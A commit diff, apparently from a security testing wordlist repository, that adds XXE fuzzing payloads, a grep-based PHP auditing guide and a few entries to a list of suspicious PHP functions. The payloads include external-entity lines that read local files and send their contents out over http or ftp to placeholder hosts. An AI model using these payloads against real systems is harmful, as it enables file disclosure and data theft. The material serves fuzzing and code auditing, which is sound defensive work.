Close #106 - XXE-Fuzzing / Grep PHP Auditing

Fuzzing/XXE-Fuzzing.txt

@@ -45,5 +45,7 @@ x' or name()='username' or 'x'='y
 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com/text.txt" >]>
 <!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]>
 <!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://127.0.0.1:80/?%file;'>  "> %int;
+<!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'ftp://127.0.0.1:21/%data3;'>">
 <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///etc/issue"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]>
 <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///c:/boot.ini"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]>
+<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>

Pattern-Matching/grepstrings-auditing-php.md

@@ -0,0 +1,46 @@
+# Auditing php source code with grep
+
+## XSS
+`grep -Ri "echo" *`
+
+`grep -Ri "\$_" * | grep "echo"`
+
+`grep -Ri "\$_GET" * | grep "echo"`
+
+`grep -Ri "\$_POST" * | grep "echo"`
+
+`grep -Ri "\$_REQUEST" * | grep "echo"`
+
+
+- - -
+
+
+## SQL Injection
+`grep -Ri "$sql" *`
+
+`grep -RI "mysqli(" *`
+
+`grep -Ri "pdo(" * `
+
+
+- - -
+
+
+
+## File inclusion
+`grep -Ri "file_include(" * `
+
+`grep -Ri "file_get_contents(" * `
+
+`grep -Ri "include(" *`
+
+
+- - -
+
+
+## Command execution
+`grep -Ri "shell_exec(" *`
+
+`grep -RIt "system(" *`
+
+`grep -Ri "exec(" * `

Pattern-Matching/malicious.txt

@@ -92,3 +92,6 @@ str_repeat
 unserialize
 register_tick_function
 register_shutdown_function
+getuid
+uname
+gethostname